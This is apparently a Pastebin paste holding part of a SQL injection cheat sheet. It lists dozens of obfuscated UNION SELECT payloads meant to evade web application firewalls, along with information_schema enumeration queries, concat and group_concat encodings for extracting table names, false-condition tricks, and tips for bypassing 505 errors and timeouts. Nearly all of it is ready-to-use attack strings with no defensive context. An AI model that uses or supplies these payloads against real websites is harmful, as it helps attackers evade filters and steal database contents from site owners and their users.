  676. +(UnI)(oN)+(SeL)(EcT)
  677. +�UnI�On�+'SeL�ECT�
  678. +uni on+sel ect+
  679. +/*!UnIoN*/+/*!SeLeCt*/+
  680. /*!u%6eion*/ /*!se%6cect*/
  681. uni%20union%20/*!select*/%20
  682. union%23aa%0Aselect
  683. /**/union/*!50000select*/
  684. /^.*union.*$/ /^.*select.*$/
  685. /*union*/union/*select*/select+
  686. /*uni X on*/union/*sel X ect*/
  687. +un/**/ion+sel/**/ect+
  688. +UnIOn%0d%0aSeleCt%0d%0a
  689. UNION/*&test=1*/SELECT/*&pwn=2*/
  690. un?+un/**/ion+se/**/lect+
  691. +UNunionION+SEselectLECT+
  692. +uni%0bon+se%0blect+
  693. %252f%252a*/union%252f%252a /select%252f%252a*/
  694. /%2A%2A/union/%2A%2A/select/%2A%2A/
  695. %2f**%2funion%2f**%2fselect%2f**%2f
  696. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  697. /*!UnIoN*/SeLecT+
  698.  
  699. [~] information_schema.tables [~]
  700. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  701. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  702. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  703. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  704. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  705. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  706.  
  707. [~] concat() [~]
  708. CoNcAt()
  709. concat()
  710. CON%08CAT()
  711. CoNcAt()
  712. %0AcOnCat()
  713. /**//*!12345cOnCat*/
  714. /*!50000cOnCat*/(/*!*/)
  715. unhex(hex(concat(table_name)))
  716. unhex(hex(/*!12345concat*/(table_name)))
  717. unhex(hex(/*!50000concat*/(table_name)))
  718.  
  719. [~] group_concat() [~]
  720. /*!group_concat*/()
  721. gRoUp_cOnCAt()
  722. group_concat(/*!*/)
  723. group_concat(/*!12345table_name*/)
  724. group_concat(/*!50000table_name*/)
  725. /*!group_concat*/(/*!12345table_name*/)
  726. /*!group_concat*/(/*!50000table_name*/)
  727. /*!12345group_concat*/(/*!12345table_name*/)
  728. /*!50000group_concat*/(/*!50000table_name*/)
  729. /*!GrOuP_ConCaT*/()
  730. /*!12345GroUP_ConCat*/()
  731. /*!50000gRouP_cOnCaT*/()
  732. /*!50000Gr%6fuP_c%6fnCAT*/()
  733. unhex(hex(group_concat(table_name)))
  734. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  735. unhex(hex(/*!12345group_concat*/(table_name)))
  736. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  737. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  738. unhex(hex(/*!50000group_concat*/(table_name)))
  739. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  740. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  741. convert(group_concat(table_name)+using+ascii)
  742. convert(group_concat(/*!table_name*/)+using+ascii)
  743. convert(group_concat(/*!12345table_name*/)+using+ascii)
  744. convert(group_concat(/*!50000table_name*/)+using+ascii)
  745. CONVERT(group_concat(table_name)+USING+latin1)
  746. CONVERT(group_concat(table_name)+USING+latin2)
  747. CONVERT(group_concat(table_name)+USING+latin3)
  748. CONVERT(group_concat(table_name)+USING+latin4)
  749. CONVERT(group_concat(table_name)+USING+latin5)
  750.  
  751. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  752. +div+0
  753. Having+1=0
  754. +AND+1=0
  755. +/*!and*/+1=0
  756. and(1)=(0)
  757. when the --+- or -- dosen't work use ;%00
  758.  
  759.  
  760.  
  761. bypass error 505
  762. sometimes when union select ,sites become 505 or time out....
  763. bypass-
  764. -use brackets
  765. union(select+1)
  766. -use %0b or /**/ as space
  767. union%0bselect
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!